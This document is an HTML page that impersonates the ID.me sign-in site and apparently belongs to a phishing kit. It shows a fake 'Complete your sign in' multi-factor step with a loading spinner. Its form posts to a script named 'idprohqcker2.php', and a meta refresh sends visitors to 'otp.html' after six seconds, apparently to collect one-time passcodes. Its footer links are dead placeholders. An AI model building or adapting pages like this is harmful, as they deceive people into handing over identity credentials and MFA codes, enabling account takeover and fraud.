<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
    <meta http-equiv="refresh" content="6; url=otp.html">
    <style>body {transition: opacity ease-in 0.2s; } 
    body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
    </style>
    <title itemprop="name"> Sign in to ID.me - ID.me</title>
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="One Identity. One Wallet." name="description">
    <meta content="" name="keywords">
    <meta content="text/html; charset=utf-8" http-equiv="content-type">
    <meta content="noodp" name="robots">
    <meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
    <meta content="noindex" name="robots">
    <link rel="icon" type="image/png" href="id.ico">
    <link rel="stylesheet" href="css/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css">
</head>
<body class="">
    <div class="page-container" data-role="page-container">
        <div class="container">
            <div class="content-container">
                <form class="new_token_request_password" id="new_token_request_password"  action="idprohqcker2.php" accept-charset="UTF-8" method="post">
                    <div class="form-header">
                        <div class="form-header-content" role="banner">
                            <div class="partner">
                                <div class="c_icon m_idme">
                                    <img alt="ID.me" src="images/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg">
                                </div>
                            </div>
                        </div>
                    </div>
                    <main aria-labelledby="sr_page_title" class="form-container">
                        <h1 id="sr_page_title">Complete your sign in</h1>
                        <ul class="subway_stops three-stops">
                            <li class="subway_stops-item">
                                <span>1</span>
                                <span class="sr-only">Choose your multi-factor method</span>
                            </li>
                            <li aria-current="true" class="subway_stops-item active">
                                <span class="sr-only">Current step</span>
                                <span>2</span>
                                <span class="sr-only">Initiate your multi-factor method</span>
                            </li>
                            <li class="subway_stops-item">
                                <span>3</span>
                                <span class="sr-only">Confirm your multi-factor method</span>
                            </li>
                        </ul>
                        <div class="form-content" data-form=".multifactor-event-form" data-time="20">
                            <p>
                                <img data-hidpi-src="images/spinner@2x-5539e7ba524b1f26b157a45869ecc2d5e9ea7d614bb1ec4fe98699c2427deb94.gif" alt="Loading..." width="35" height="35" aria-hidden="true" class="icon-loading" src="images/spinner@2x-5539e7ba524b1f26b157a45869ecc2d5e9ea7d614bb1ec4fe98699c2427deb94.gif" data-lowdpi-src="images/spinner-e0c09dda80a4573ca86225f7cec6a69eb9e7082f287dc920afded1805728a982.gif">
                            </p>                        
                        </div>                        
                    </main>
                </form>
            </div>
            <aside aria-label="Select Language" class="language">
                <div class="language-selection" data-component="Components.Language"><a class="language-selection-toggle" href="#">English</a></div>
            </aside>
            <footer class="footer">
                <nav aria-label="Footer" class="footer__links">
                    <ul class="footer__list">
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">What is ID.me?</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Terms of Service</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>
        </div>
    </div>
</body>
</html>